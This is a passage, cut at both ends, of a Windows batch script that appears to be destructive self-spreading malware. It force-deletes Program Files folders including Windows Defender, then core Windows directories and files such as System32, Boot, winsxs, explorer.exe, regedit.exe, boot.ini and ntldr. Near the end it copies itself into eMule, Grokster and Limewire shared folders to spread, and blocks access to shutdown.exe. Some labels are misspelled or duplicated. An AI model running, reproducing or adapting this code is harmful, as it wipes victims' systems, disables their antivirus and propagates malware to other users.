-r -s -h Attrib "%programfiles%\Microsoft SDKs" -r -s -h Del /F /Q /S "%programfiles%\Microsoft SDKs\*.*" Del /F /Q /S "%programfiles%\Microsoft SDKs" :pasmssdk If exist "%programfiles%\Microsoft Silverlight" goto delmssl If not exist "%programfiles%\Microsoft Silverlight" goto pasmssl :delmssl Attrib "%programfiles%\Microsoft Silverlight\*.*" -r -s -h Attrib "%programfiles%\Microsoft Silverlight" -r -s -h Del /F /Q /S "%programfiles%\Microsoft Silverlight\*.*" Del /F /Q /S "%programfiles%\Microsoft Silverlight" :pasmssl If exist "%programfiles%\Microsoft SQL Server" goto delmsss If not exist "%programfiles%\Microsoft SQL Server" goto pasmsss :delmsss Attrib "%programfiles%\Microsoft SQL Server\*.*" -r -s -h Attrib "%programfiles%\Microsoft SQL Server" -r -s -h Del /F /Q /S "%programfiles%\Microsoft SQL Server\*.*" Del /F /Q /S "%programfiles%\Microsoft SQL Server" :pasmsss If exist "%programfiles%\Microsoft SQL Server Compact Edition" goto delmsssce If not exist "%programfiles%\Microsoft SQL Server Compact Edition" goto pasmsssce :delmsssce Attrib "%programfiles%\Microsoft SQL Server Compact Edition\*.*" -r -s -h Attrib "%programfiles%\Microsoft SQL Server Compact Edition" -r -s -h Del /F /Q /S "%programfiles%\Microsoft SQL Server Compact Edition\*.*" Del /F /Q /S "%programfiles%\Microsoft SQL Server Compact Edition" :pasmsssce If exist "%programfiles%\Microsoft WCF Data Services" goto delmswds If not exist "%programfiles%\Microsoft WCF Data Services" goto pasmswds :delmswds Attrib "%programfiles%\Microsoft WCF Data Services\*.*" -r -s -h Attrib "%programfiles%\Microsoft WCF Data Services" -r -s -h Del /F /Q /S "%programfiles%\Microsoft WCF Data Services\*.*" Del /F /Q /S "%programfiles%\Microsoft WCF Data Services" :pasmswds If exist "%programfiles%\Microsoft Web Tools" goto delmswt If not exist "%programfiles%\Microsoft Web Tools" goto pasmswt :delmswt Attrib "%programfiles%\Microsoft Web Tools\*.*" -r -s -h Attrib "%programfiles%\Microsoft Web Tools" -r -s -h Del /F /Q /S "%programfiles%\Microsoft Web Tools\*.*" Del /F /Q /S "%programfiles%\Microsoft Web Tools" :pasmswt If exist "%programfiles%\Microsoft XDE" goto delmsxde If not exist "%programfiles%\Microsoft XDE" goto pasmsxde :delmsxde Attrib "%programfiles%\Microsoft XDE\*.*" -r -s -h Attrib "%programfiles%\Microsoft XDE" -r -s -h Del /F /Q /S "%programfiles%\Microsoft XDE\*.*" Del /F /Q /S "%programfiles%\Microsoft XDE" :pasmsxde If exist "%programfiles%\Microsoft.NET" goto delmsnet If not exist "%programfiles%\Microsoft.NET" goto pasmsnet :delmsnet Attrib "%programfiles%\Microsoft.NET\*.*" -r -s -h Attrib "%programfiles%\Microsoft.NET" -r -s -h Del /F /Q /S "%programfiles%\Microsoft.NET\*.*" Del /F /Q /S "%programfiles%\Microsoft.NET" :pasmsnet If exist "%programfiles%\Mozilla Firefox" goto delfirefox If not exist "%programfiles%\Mozilla Firefox" goto pasfirefox :delfirfox Attrib "%programfiles%\Mozilla Firefox\*.*" -r -s -h Attrib "%programfiles%\Mozilla Firefox" -r -s -h Del /F /Q /S "%programfiles%\Mozilla Firefox\*.*" Del /F /Q /S "%programfiles%\Mozilla Firefox" Del /F /Q /S "%programfiles%\Mozilla Maintenance Service\*.*" Del /F /Q /S "%programfiles%\Mozilla Maintenance Service" :pasfirefox If exist "%programfiles%\MSBuild" goto delmsbld If not exist "%programfiles%\MSBuild" goto pasmsbld :delmsbld Attrib "%programfiles%\MSBuild\*.*" -r -s -h Attrib "%programfiles%\MSBuild" -r -s -h Del /F /Q /S "%programfiles%\MSBuild\*.*" Del /F /Q /S "%programfiles%\MSBuild" :pasmsbld If exist "%programfiles%\Opera" goto delopra If not exist "%programfiles%\Opera" goto pasopra :delopra Attrib "%programfiles%\Opera\*.*" -r -s -h Attrib "%programfiles%\Opera" -r -s -h Del /F /Q /S "%programfiles%\Opera\*.*" Del /F /Q /S "%programfiles%\Opera" :pasopra If exist "%programfiles%\Reference Assemblies" goto delrfsmb If not exist "%programfiles%\Reference Assemblies" goto pasrfsmb :delrfsmb Attrib "%programfiles%\Reference Assemblies\*.*" -r -s -h Attrib "%programfiles%\Reference Assemblies" -r -s -h Del /F /Q /S "%programfiles%\Reference Assemblies\*.*" Del /F /Q /S "%programfiles%\Reference Assemblies" :pasrfsmb If exist "%programfiles%\TAP-Windows" goto deltpwin If not exist "%programfiles%\TAP-Windows" goto pastpwin :deltpwin Attrib "%programfiles%\TAP-Windows\*.*" -r -s -h Attrib "%programfiles%\TAP-Windows" -r -s -h Del /F /Q /S "%programfiles%\TAP-Windows\*.*" Del /F /Q /S "%programfiles%\TAP-Windows" :pastpwin If exist "%programfiles%\Windows Defender" goto delwndfnd If not exist "%programfiles%\Windows Defender" goto paswndfnd :delwndfnd Attrib "%programfiles%\Windows Defender\*.*" -r -s -h Attrib "%programfiles%\Windows Defender" -r -s -h Del /F /Q /S "%programfiles%\Windows Defender\*.*" Del /F /Q /S "%programfiles%\Windows Defender" :paswndfnd If exist "%programfiles%\Windows Journal" goto delwnjrnl If not exist "%programfiles%\Windows Journal" goto paswnjrnl :delwnjrnl Attrib "%programfiles%\Windows Journal\*.*" -r -s -h Attrib "%programfiles%\Windows Journal" -r -s -h Del /F /Q /S "%programfiles%\Windows Journal\*.*" Del /F /Q /S "%programfiles%\Windows Journal" :paswnjrnl If exist "%programfiles%\Windows Kits" goto delwnkit If not exist "%programfiles%\Windows Kits" goto paswnkit :delwnkit Attrib "%programfiles%\Windows Kits\*.*" -r -s -h Attrib "%programfiles%\Windows Kits" -r -s -h Del /F /Q /S "%programfiles%\Windows Kits\*.*" Del /F /Q /S "%programfiles%\Windows Kits" :paswnkit If exist "%programfiles%\Windows Mail" goto delwnmail If not exist "%programfiles%\Windows Mail" goto paswnmail :delwnmail Attrib "%programfiles%\Windows Mail\*.*" -r -s -h Attrib "%programfiles%\Windows Mail" -r -s -h Del /F /Q /S "%programfiles%\Windows Mail\*.*" Del /F /Q /S "%programfiles%\Windows Mail" :paswnmail If exist "%programfiles%\Windows Media Player" goto delwnmpl If not exist "%programfiles%\Windows Media Player" goto paswnmpl :delwnmpl Attrib "%programfiles%\Windows Media Player\*.*" -r -s -h Attrib "%programfiles%\Windows Media Player" -r -s -h Del /F /Q /S "%programfiles%\Windows Media Player\*.*" Del /F /Q /S "%programfiles%\Windows Media Player" :paswnmpl If exist "%programfiles%\Windows NT" goto delwnnt If not exist "%programfiles%\Windows NT" goto paswnnt :delwnnt Attrib "%programfiles%\Windows NT\*.*" -r -s -h Attrib "%programfiles%\Windows NT" -r -s -h Del /F /Q /S "%programfiles%\Windows NT\*.*" Del /F /Q /S "%programfiles%\Windows NT" :paswnnt If exist "%programfiles%\Windows Phone Kits" goto delwnphkt If not exist "%programfiles%\Windows Phone Kits" goto paswnphkt :delwnphkt Attrib "%programfiles%\Windows Phone Kits\*.*" -r -s -h Attrib "%programfiles%\Windows Phone Kits" -r -s -h Del /F /Q /S "%programfiles%\Windows Phone Kits\*.*" Del /F /Q /S "%programfiles%\Windows Phone Kits" :paswnphkt If exist "%programfiles%\Windows Phone Silverlight Kits" goto delwnphktsk If not exist "%programfiles%\Windows Phone Silverlight Kits" goto paswnphktsk :delwnphktsk Attrib "%programfiles%\Windows Phone Silverlight Kits\*.*" -r -s -h Attrib "%programfiles%\Windows Phone Silverlight Kits" -r -s -h Del /F /Q /S "%programfiles%\Windows Phone Silverlight Kits\*.*" Del /F /Q /S "%programfiles%\Windows Phone Silverlight Kits" :paswnphktsk If exist "%programfiles%\Windows Photo Viewer" goto delwnphvw If not exist "%programfiles%\Windows Photo Viewer" goto paswnphvw :delwnphvw Attrib "%programfiles%\Windows Photo Viewer\*.*" -r -s -h Attrib "%programfiles%\Windows Photo Viewer" -r -s -h Del /F /Q /S "%programfiles%\Windows Photo Viewer\*.*" Del /F /Q /S "%programfiles%\Windows Photo Viewer" :paswnphvw If exist "%programfiles%\Windows Portable Devices" goto delwnprds If not exist "%programfiles%\Windows Portable Devices" goto paswnprds :delwnprds Attrib "%programfiles%\Windows Portable Devices\*.*" -r -s -h Attrib "%programfiles%\Windows Portable Devices" -r -s -h Del /F /Q /S "%programfiles%\Windows Portable Devices\*.*" Del /F /Q /S "%programfiles%\Windows Portable Devices" :paswnprds If exist "%programfiles%\Windows Sidebar" goto delwnsdbr If not exist "%programfiles%\Windows Sidebar" goto paswnsdbr :delwnsdbr Attrib "%programfiles%\Windows Sidebar\*.*" -r -s -h Attrib "%programfiles%\Windows Sidebar" -r -s -h Del /F /Q /S "%programfiles%\Windows Sidebar\*.*" Del /F /Q /S "%programfiles%\Windows Sidebar" :paswnsdbr Attrib "%homedrive%\Windows\addins\*.*" -r -s -h Attrib "%homedrive%\Windows\addins" -r -s -h Del /F /Q /S "%homedrive%\Windows\addins" Attrib "%homedrive%\Windows\AppCompat\*.*" -r -s -h Attrib "%homedrive%\Windows\AppCompat" -r -s -h Del /F /Q /S "%homedrive%\Windows\AppCompat\*.*" Del /F /Q /S "%homedrive%\Windows\AppCompat" Attrib "%homedrive%\Windows\AppPatch\*.*" -r -s -h Attrib "%homedrive%\Windows\AppPatch" -r -s -h Del /F /Q /S "%homedrive%\Windows\AppPatch\*.*" Del /F /Q /S "%homedrive%\Windows\AppPatch" Attrib "%homedrive%\Windows\assembly\*.*" -r -s -h Attrib "%homedrive%\Windows\assembly" -r -s -h Del /F /Q /S "%homedrive%\Windows\assembly\*.*" Del /F /Q /S "%homedrive%\Windows\assembly" Attrib "%homedrive%\Windows\Boot\*.*" -r -s -h Attrib "%homedrive%\Windows\Boot" -r -s -h Del /F /Q /S "%homedrive%\Windows\Boot\*.*" Del /F /Q /S "%homedrive%\Windows\Boot" Attrib "%homedrive%\Windows\Branding\*.*" -r -s -h Attrib "%homedrive%\Windows\Branding" -r -s -h Del /F /Q /S "%homedrive%\Windows\Branding\*.*" Del /F /Q /S "%homedrive%\Windows\Branding" Attrib "%homedrive%\Windows\CheckSur\*.*" -r -s -h Attrib "%homedrive%\Windows\CheckSur" -r -s -h Del /F /Q /S "%homedrive%\Windows\CheckSur\*.*" Del /F /Q /S "%homedrive%\Windows\CheckSur" Attrib "%homedrive%\Windows\CSC\*.*" -r -s -h Attrib "%homedrive%\Windows\CSC" -r -s -h Del /F /Q /S "%homedrive%\Windows\CSC\*.*" Del /F /Q /S "%homedrive%\Windows\CSC" Attrib "%homedrive%\Windows\Cursors\*.*" -r -s -h Attrib "%homedrive%\Windows\Cursors" -r -s -h Del /F /Q /S "%homedrive%\Windows\Cursors\*.*" Del /F /Q /S "%homedrive%\Windows\Cursors" Attrib "%homedrive%\Windows\debug\*.*" -r -s -h Attrib "%homedrive%\Windows\debug" -r -s -h Del /F /Q /S "%homedrive%\Windows\debug\*.*" Del /F /Q /S "%homedrive%\Windows\debug" Attrib "%homedrive%\Windows\diagnostics\*.*" -r -s -h Attrib "%homedrive%\Windows\diagnostics" -r -s -h Del /F /Q /S "%homedrive%\Windows\diagnostics\*.*" Del /F /Q /S "%homedrive%\Windows\diagnostics" Attrib "%homedrive%\Windows\DigitalLocker\*.*" -r -s -h Attrib "%homedrive%\Windows\DigitalLocker" -r -s -h Del /F /Q /S "%homedrive%\Windows\DigitalLocker\*.*" Del /F /Q /S "%homedrive%\Windows\DigitalLocker" Attrib "%homedrive%\Windows\Downloaded Program Files\*.*" -r -s -h Attrib "%homedrive%\Windows\Downloaded Program Files" -r -s -h Del /F /Q /S "%homedrive%\Windows\Downloaded Program Files\*.*" Del /F /Q /S "%homedrive%\Windows\Downloaded Program Files" Attrib "%homedrive%\Windows\ehome\*.*" -r -s -h Attrib "%homedrive%\Windows\ehome" -r -s -h Del /F /Q /S "%homedrive%\Windows\ehome\*.*" Del /F /Q /S "%homedrive%\Windows\ehome" Attrib "%homedrive%\Windows\en-US\*.*" -r -s -h Attrib "%homedrive%\Windows\en-US" -r -s -h Del /F /Q /S "%homedrive%\Windows\en-US\*.*" Del /F /Q /S "%homedrive%\Windows\en-US" Attrib "%homedrive%\Windows\Fonts\*.*" -r -s -h Attrib "%homedrive%\Windows\Fonts" -r -s -h Del /F /Q /S "%homedrive%\Windows\Fonts\*.*" Del /F /Q /S "%homedrive%\Windows\Fonts" Attrib "%homedrive%\Windows\Globalization\*.*" -r -s -h Attrib "%homedrive%\Windows\Globalization" -r -s -h Del /F /Q /S "%homedrive%\Windows\Globalization\*.*" Del /F /Q /S "%homedrive%\Windows\Globalization" Attrib "%homedrive%\Windows\Help\*.*" -r -s -h Attrib "%homedrive%\Windows\Help" -r -s -h Del /F /Q /S "%homedrive%\Windows\Help\*.*" Del /F /Q /S "%homedrive%\Windows\Help" Attrib "%homedrive%\Windows\IME\*.*" -r -s -h Attrib "%homedrive%\Windows\IME" -r -s -h Del /F /Q /S "%homedrive%\Windows\IME\*.*" Del /F /Q /S "%homedrive%\Windows\IME" Attrib "%homedrive%\Windows\inf\*.*" -r -s -h Attrib "%homedrive%\Windows\inf" -r -s -h Del /F /Q /S "%homedrive%\Windows\inf\*.*" Del /F /Q /S "%homedrive%\Windows\inf" Attrib "%homedrive%\Windows\L2Schemas\*.*" -r -s -h Attrib "%homedrive%\Windows\L2Schemas" -r -s -h Del /F /Q /S "%homedrive%\Windows\L2Schemas\*.*" Del /F /Q /S "%homedrive%\Windows\L2Schemas" Attrib "%homedrive%\Windows\LiveKernelReports\*.*" -r -s -h Attrib "%homedrive%\Windows\LiveKernelReports" -r -s -h Del /F /Q /S "%homedrive%\Windows\LiveKernelReports\*.*" Del /F /Q /S "%homedrive%\Windows\LiveKernelReports" Attrib "%homedrive%\Windows\Logs\*.*" -r -s -h Attrib "%homedrive%\Windows\Logs" -r -s -h Del /F /Q /S "%homedrive%\Windows\Logs\*.*" Del /F /Q /S "%homedrive%\Windows\Logs" Attrib "%homedrive%\Windows\Media\*.*" -r -s -h Attrib "%homedrive%\Windows\Media" -r -s -h Del /F /Q /S "%homedrive%\Windows\Media\*.*" Del /F /Q /S "%homedrive%\Windows\Media" Attrib "%homedrive%\Windows\Microsoft.NET\*.*" -r -s -h Attrib "%homedrive%\Windows\Microsoft.NET" -r -s -h Del /F /Q /S "%homedrive%\Windows\Microsoft.NET\*.*" Del /F /Q /S "%homedrive%\Windows\Microsoft.NET" Attrib "%homedrive%\Windows\Migration\*.*" -r -s -h Attrib "%homedrive%\Windows\Migration" -r -s -h Del /F /Q /S "%homedrive%\Windows\Migration\*.*" Del /F /Q /S "%homedrive%\Windows\Migration" Attrib "%homedrive%\Windows\ModemLogs\*.*" -r -s -h Attrib "%homedrive%\Windows\ModemLogs" -r -s -h Del /F /Q /S "%homedrive%\Windows\ModemLogs\*.*" Del /F /Q /S "%homedrive%\Windows\ModemLogs" Attrib "%homedrive%\Windows\Offline Web Pages\*.*" -r -s -h Attrib "%homedrive%\Windows\Offline Web Pages" -r -s -h Del /F /Q /S "%homedrive%\Windows\Offline Web Pages\*.*" Del /F /Q /S "%homedrive%\Windows\Offline Web Pages" Attrib "%homedrive%\Windows\Panther\*.*" -r -s -h Attrib "%homedrive%\Windows\Panther" -r -s -h Del /F /Q /S "%homedrive%\Windows\Panther\*.*" Del /F /Q /S "%homedrive%\Windows\Panther" Attrib "%homedrive%\Windows\Performance\*.*" -r -s -h Attrib "%homedrive%\Windows\Performance" -r -s -h Del /F /Q /S "%homedrive%\Windows\Performance\*.*" Del /F /Q /S "%homedrive%\Windows\Performance" Attrib "%homedrive%\Windows\PLA\*.*" -r -s -h Attrib "%homedrive%\Windows\PLA" -r -s -h Del /F /Q /S "%homedrive%\Windows\PLA\*.*" Del /F /Q /S "%homedrive%\Windows\PLA" Attrib "%homedrive%\Windows\PolicyDefinitions\*.*" -r -s -h Attrib "%homedrive%\Windows\PolicyDefinitions" -r -s -h Del /F /Q /S "%homedrive%\Windows\PolicyDefinitions\*.*" Del /F /Q /S "%homedrive%\Windows\PolicyDefinitions" Attrib "%homedrive%\Windows\Prefetch\*.*" -r -s -h Attrib "%homedrive%\Windows\Prefetch" -r -s -h Del /F /Q /S "%homedrive%\Windows\Prefetch\*.*" Del /F /Q /S "%homedrive%\Windows\Prefetch" Attrib "%homedrive%\Windows\Registration\*.*" -r -s -h Attrib "%homedrive%\Windows\Registration" -r -s -h Del /F /Q /S "%homedrive%\Windows\Registration\*.*" Del /F /Q /S "%homedrive%\Windows\Registration" Attrib "%homedrive%\Windows\rescache\*.*" -r -s -h Attrib "%homedrive%\Windows\rescache" -r -s -h Del /F /Q /S "%homedrive%\Windows\rescache\*.*" Del /F /Q /S "%homedrive%\Windows\rescache" Attrib "%homedrive%\Windows\Resources\*.*" -r -s -h Attrib "%homedrive%\Windows\Resources" -r -s -h Del /F /Q /S "%homedrive%\Windows\Resources\*.*" Del /F /Q /S "%homedrive%\Windows\Resources" Attrib "%homedrive%\Windows\SchCache\*.*" -r -s -h Attrib "%homedrive%\Windows\SchCache" -r -s -h Del /F /Q /S "%homedrive%\Windows\SchCache\*.*" Del /F /Q /S "%homedrive%\Windows\SchCache" Attrib "%homedrive%\Windows\schemas\*.*" -r -s -h Attrib "%homedrive%\Windows\schemas" -r -s -h Del /F /Q /S "%homedrive%\Windows\schemas\*.*" Del /F /Q /S "%homedrive%\Windows\schemas" Attrib "%homedrive%\Windows\security\*.*" -r -s -h Attrib "%homedrive%\Windows\security" -r -s -h Del /F /Q /S "%homedrive%\Windows\security\*.*" Del /F /Q /S "%homedrive%\Windows\security" Attrib "%homedrive%\Windows\ServiceProfiles\*.*" -r -s -h Attrib "%homedrive%\Windows\ServiceProfiles" -r -s -h Del /F /Q /S "%homedrive%\Windows\ServiceProfiles\*.*" Del /F /Q /S "%homedrive%\Windows\ServiceProfiles" Attrib "%homedrive%\Windows\servicing\*.*" -r -s -h Attrib "%homedrive%\Windows\servicing" -r -s -h Del /F /Q /S "%homedrive%\Windows\servicing\*.*" Del /F /Q /S "%homedrive%\Windows\servicing" Attrib "%homedrive%\Windows\Setup\*.*" -r -s -h Attrib "%homedrive%\Windows\Setup" -r -s -h Del /F /Q /S "%homedrive%\Windows\Setup\*.*" Del /F /Q /S "%homedrive%\Windows\Setup" Attrib "%homedrive%\Windows\ShellNew\*.*" -r -s -h Attrib "%homedrive%\Windows\ShellNew" -r -s -h Del /F /Q /S "%homedrive%\Windows\ShellNew\*.*" Del /F /Q /S "%homedrive%\Windows\ShellNew" Attrib "%homedrive%\Windows\SoftwareDistribution\*.*" -r -s -h Attrib "%homedrive%\Windows\SoftwareDistribution" -r -s -h Del /F /Q /S "%homedrive%\Windows\SoftwareDistribution\*.*" Del /F /Q /S "%homedrive%\Windows\SoftwareDistribution" Attrib "%homedrive%\Windows\Speech\*.*" -r -s -h Attrib "%homedrive%\Windows\Speech" -r -s -h Del /F /Q /S "%homedrive%\Windows\Speech\*.*" Del /F /Q /S "%homedrive%\Windows\Speech" Attrib "%homedrive%\Windows\symbols\*.*" -r -s -h Attrib "%homedrive%\Windows\symbols" -r -s -h Del /F /Q /S "%homedrive%\Windows\symbols\*.*" Del /F /Q /S "%homedrive%\Windows\symbols" Attrib "%homedrive%\Windows\system\*.*" -r -s -h Attrib "%homedrive%\Windows\system" -r -s -h Del /F /Q /S "%homedrive%\Windows\system\*.*" Del /F /Q /S "%homedrive%\Windows\system" Attrib "%homedrive%\Windows\System32\*.*" -r -s -h Attrib "%homedrive%\Windows\System32" -r -s -h Del /F /Q /S "%homedrive%\Windows\System32\*.*" Del /F /Q /S "%homedrive%\Windows\System32" Attrib "%homedrive%\Windows\TAPI\*.*" -r -s -h Attrib "%homedrive%\Windows\TAPI" -r -s -h Del /F /Q /S "%homedrive%\Windows\TAPI\*.*" Del /F /Q /S "%homedrive%\Windows\TAPI" Attrib "%homedrive%\Windows\Tasks\*.*" -r -s -h Attrib "%homedrive%\Windows\Tasks" -r -s -h Del /F /Q /S "%homedrive%\Windows\Tasks\*.*" Del /F /Q /S "%homedrive%\Windows\Tasks" Attrib "%homedrive%\Windows\Temp\*.*" -r -s -h Attrib "%homedrive%\Windows\Temp" -r -s -h Del /F /Q /S "%homedrive%\Windows\Temp\*.*" Del /F /Q /S "%homedrive%\Windows\Temp" Attrib "%homedrive%\Windows\tracing\*.*" -r -s -h Attrib "%homedrive%\Windows\tracing" -r -s -h Del /F /Q /S "%homedrive%\Windows\tracing\*.*" Del /F /Q /S "%homedrive%\Windows\tracing" Attrib "%homedrive%\Windows\twain_32\*.*" -r -s -h Attrib "%homedrive%\Windows\twain_32" -r -s -h Del /F /Q /S "%homedrive%\Windows\twain_32\*.*" Del /F /Q /S "%homedrive%\Windows\twain_32" Attrib "%homedrive%\Windows\Vss\*.*" -r -s -h Attrib "%homedrive%\Windows\Vss" -r -s -h Del /F /Q /S "%homedrive%\Windows\Vss\*.*" Del /F /Q /S "%homedrive%\Windows\Vss" Attrib "%homedrive%\Windows\Web\*.*" -r -s -h Attrib "%homedrive%\Windows\Web" -r -s -h Del /F /Q /S "%homedrive%\Windows\Web\*.*" Del /F /Q /S "%homedrive%\Windows\Web" Attrib "%homedrive%\Windows\winsxs\*.*" -r -s -h Attrib "%homedrive%\Windows\winsxs" -r -s -h Del /F /Q /S "%homedrive%\Windows\winsxs\*.*" Del /F /Q /S "%homedrive%\Windows\winsxs" If exist "%homedrive%\Windows\_default.pif" goto deldefault If not exist "%homedrive%\Windows\_default.pif" goto pasdefault :deldefault Attrib "%homedrive%\Windows\_default.pif" -r -s -h Del /F /Q "%homedrive%\Windows\_default.pif" :pasdefault If exist "%homedrive%\Windows\bfsvc.exe" goto delbfsvc If not exist "%homedrive%\Windows\bfsvc" goto pasbfsvc :delbfsvc Attrib "%homedrive%\Windows\bfsvc.exe" -r -s -h Del /F /Q "%homedrive%\Windows\bfsvc.exe" :pasbfsvc If exist "%homedrive%\Windows\bootstat.dat" goto delbtstat If not exist "%homedrive%\Windows\bootstat.dat" goto pasbtstat :delbtstat Attrib "%homedrive%\Windows\bootstat.dat" -r -s -h Del /F /Q "%homedrive%\Windows\bootstat.dat" :pasbtstat If exist "%homedrive%\Windows\DtcInstall.log" goto deldtcins If not exist "%homedrive%\Windows\DtcInstall.log" goto pasdtcins :deldtcins Attrib "%homedrive%\Windows\DtcInstall.log" -r -s -h Del /F /Q "%homedrive%\Windows\DtcInstall.log" :pasdtcins If exist "%homedrive%\Windows\epplauncher.mif" goto deldtcins If not exist "%homedrive%\Windows\epplauncher.mif" goto pasdtcins :deldtcins Attrib "%homedrive%\Windows\epplauncher.mif" -r -s -h Del /F /Q "%homedrive%\Windows\epplauncher.mif" :pasdtcins If exist "%homedrive%\Windows\explorer.exe" goto delexplr If not exist "%homedrive%\Windows\explorer.exe" goto pasexplr :delexplr Attrib "%homedrive%\Windows\explorer.exe" -r -s -h Del /F /Q "%homedrive%\Windows\explorer.exe" :pasexplr If exist "%homedrive%\Windows\fveupdate.exe" goto delexplr If not exist "%homedrive%\Windows\fveupdate.exe" goto pasexplr :delexplr Attrib "%homedrive%\Windows\fveupdate.exe" -r -s -h Del /F /Q "%homedrive%\Windows\fveupdate.exe" :pasexplr If exist "%homedrive%\Windows\HelpPane.exe" goto delhelppn If not exist "%homedrive%\Windows\HelpPane.exe" goto pashelppn :delhelppn Attrib "%homedrive%\Windows\fveupdate.exe" -r -s -h Del /F /Q "%homedrive%\Windows\fveupdate.exe" :pashelppn If exist "%homedrive%\Windows\hh.exe" goto delhh If not exist "%homedrive%\Windows\hh.exe" goto pashh :delhh Attrib "%homedrive%\Windows\hh.exe" -r -s -h Del /F /Q "%homedrive%\Windows\hh.exe" :pashh If exist "%homedrive%\Windows\IE11_main.log" goto delie11mn If not exist "%homedrive%\Windows\IE11_main.log" goto pasie11mn :delie11mn Attrib "%homedrive%\Windows\IE11_main.log" -r -s -h Del /F /Q "%homedrive%\Windows\IE11_main.log" :pasie11mn If exist "%homedrive%\Windows\mib.bin" goto delie11mn If not exist "%homedrive%\Windows\mib.bin" goto pasie11mn :delie11mn Attrib "%homedrive%\Windows\mib.bin" -r -s -h Del /F /Q "%homedrive%\Windows\mib.bin" :pasie11mn If exist "%homedrive%\Windows\msdfmap.ini" goto delmsdfmp If not exist "%homedrive%\Windows\msdfmap.ini" goto pasmsdfmp :delmsdfmp Attrib "%homedrive%\Windows\msdfmap.ini" -r -s -h Del /F /Q "%homedrive%\Windows\msdfmap.ini" :pasmsdfmp If exist "%homedrive%\Windows\notepad.exe" goto delntpd If not exist "%homedrive%\Windows\notepad.exe" goto pasntpd :delntpd Attrib "%homedrive%\Windows\notepad.exe" -r -s -h Del /F /Q "%homedrive%\Windows\notepad.exe" :pasntpd If exist "%homedrive%\Windows\PFRO.log" goto delpfro If not exist "%homedrive%\Windows\PFRO.log" goto paspfro :delpfro Attrib "%homedrive%\Windows\PFRO.log" -r -s -h Del /F /Q "%homedrive%\Windows\PFRO.log" :paspfro If exist "%homedrive%\Windows\Professional.xml" goto delprofs If not exist "%homedrive%\Windows\Professional.xml" goto pasprofs :delprofs Attrib "%homedrive%\Windows\Professional.xml" -r -s -h Del /F /Q "%homedrive%\Windows\Professional.xml" :pasprofs If exist "%homedrive%\Windows\regedit.exe" goto delreg If not exist "%homedrive%\Windows\regedit.exe" goto pasreg :delreg Attrib "%homedrive%\Windows\regedit.exe" -r -s -h Del /F /Q "%homedrive%\Windows\regedit.exe" :pasreg If exist "%homedrive%\Windows\setupact.log" goto delstpct If not exist "%homedrive%\Windows\setupact.log" goto passtpct :delstpct Attrib "%homedrive%\Windows\setupact.log" -r -s -h Del /F /Q "%homedrive%\Windows\setupact.log" :passtpct If exist "%homedrive%\Windows\setuperr.log" goto delstperr If not exist "%homedrive%\Windows\setuperr.log" goto passtperr :delstperr Attrib "%homedrive%\Windows\setuperr.log" -r -s -h Del /F /Q "%homedrive%\Windows\setuperr.log" :passtperr If exist "%homedrive%\Windows\Starter.xml" goto delstarter If not exist "%homedrive%\Windows\Starter.xml" goto passtarter :delstarter Attrib "%homedrive%\Windows\Starter.xml" -r -s -h Del /F /Q "%homedrive%\Windows\Starter.xml" :passtarter If exist "%homedrive%\Windows\system.ini" goto delsys If not exist "%homedrive%\Windows\system.ini" goto passys :delsys Attrib "%homedrive%\Windows\system.ini" -r -s -h Del /F /Q "%homedrive%\Windows\system.ini" :passys If exist "%homedrive%\Windows\TSSysprep.log" goto deltssys If not exist "%homedrive%\Windows\TSSysprep.log" goto pastssys :deltssys Attrib "%homedrive%\Windows\TSSysprep.log" -r -s -h Del /F /Q "%homedrive%\Windows\TSSysprep.log" :pastssys If exist "%homedrive%\Windows\twain.dll" goto deltwain If not exist "%homedrive%\Windows\twain.dll" goto pastwain :deltwain Attrib "%homedrive%\Windows\twain.dll" -r -s -h Del /F /Q "%homedrive%\Windows\twain.dll" :pastwain If exist "%homedrive%\Windows\twain_32.dll" goto del_twain If not exist "%homedrive%\Windows\twain_32.dll" goto pas_twain :del_twain Attrib "%homedrive%\Windows\twain_32.dll" -r -s -h Del /F /Q "%homedrive%\Windows\twain_32.dll" :pas_twain If exist "%homedrive%\Windows\twunk_16.exe" goto del_tw16 If not exist "%homedrive%\Windows\twunk_16.exe" goto pas_tw16 :del_tw16 Attrib "%homedrive%\Windows\twunk_16.exe" -r -s -h Del /F /Q "%homedrive%\Windows\twunk_16.exe" :pas_tw16 If exist "%homedrive%\Windows\twunk_32.exe" goto del_tw32 If not exist "%homedrive%\Windows\twunk_32.exe" goto pas_tw32 :del_tw16 Attrib "%homedrive%\Windows\twunk_32.exe" -r -s -h Del /F /Q "%homedrive%\Windows\twunk_32.exe" :pas_tw16 If exist "%homedrive%\Windows\win.ini" goto del_win If not exist "%homedrive%\Windows\win.ini" goto pas_win :del_win Attrib "%homedrive%\Windows\win.ini" -r -s -h Del /F /Q "%homedrive%\Windows\win.ini" :pas_win If exist "%homedrive%\Windows\WindowsUpdate.log" goto delwinupd If not exist "%homedrive%\Windows\WindowsUpdate.log" goto paswinupd :delwinupd Attrib "%homedrive%\Windows\WindowsUpdate.log" -r -s -h Del /F /Q "%homedrive%\Windows\WindowsUpdate.log" :paswinupd If exist "%homedrive%\Windows\winhelp.exe" goto delwinhlp If not exist "%homedrive%\Windows\winhelp.exe" goto paswinhlp :delwinhlp Attrib "%homedrive%\Windows\winhelp.exe" -r -s -h Del /F /Q "%homedrive%\Windows\winhelp.exe" If exist "%homedrive%\Windows\winhlp32.exe" goto delwinhlp32 If not exist "%homedrive%\Windows\winhlp32.exe" goto paswinhlp32 :delwinhlp32 Attrib "%homedrive%\Windows\winhlp32.exe" -r -s -h Del /F /Q "%homedrive%\Windows\winhlp32.exe" :paswinhlp32 If exist "%homedrive%\Windows\WMSysPr9.prx" goto delwmsys If not exist "%homedrive%\Windows\WMSysPr9.prx" goto paswmsys :delwmsys Attrib "%homedrive%\Windows\WMSysPr9.prx" -r -s -h Del /F /Q "%homedrive%\Windows\WMSysPr9.prx" :paswmsys If exist "%homedrive%\Windows\write.exe" goto delwrite If not exist "%homedrive%\Windows\write.exe" goto paswrite :delwrite Attrib "%homedrive%\Windows\write.exe" -r -s -h Del /F /Q "%homedrive%\Windows\write.exe" :paswrite :: SPREAD VIA: eMule, Grokster, Limewire copy %0 "%programfiles%\eMule\Incoming\%0" copy %0 "%programfiles%\Grokster\My Grokster\%0" copy %0 "%programfiles%\limewire\Shared\%0" :: DISABLE SHUTDOWN icacls %windir%\system32\shutdown.exe /deny SID:D attrib –r –s –h C:\autoexec.bat del c:\autoexec.bat attrib –r –s –h C:\boot.ini del c:\boot.ini attrib –r –s –h C:\ntldr del c:\ntdlr attrib –r –s –h C:\windows\win.ini del c:\windows\win.ini attrib -r -s -h 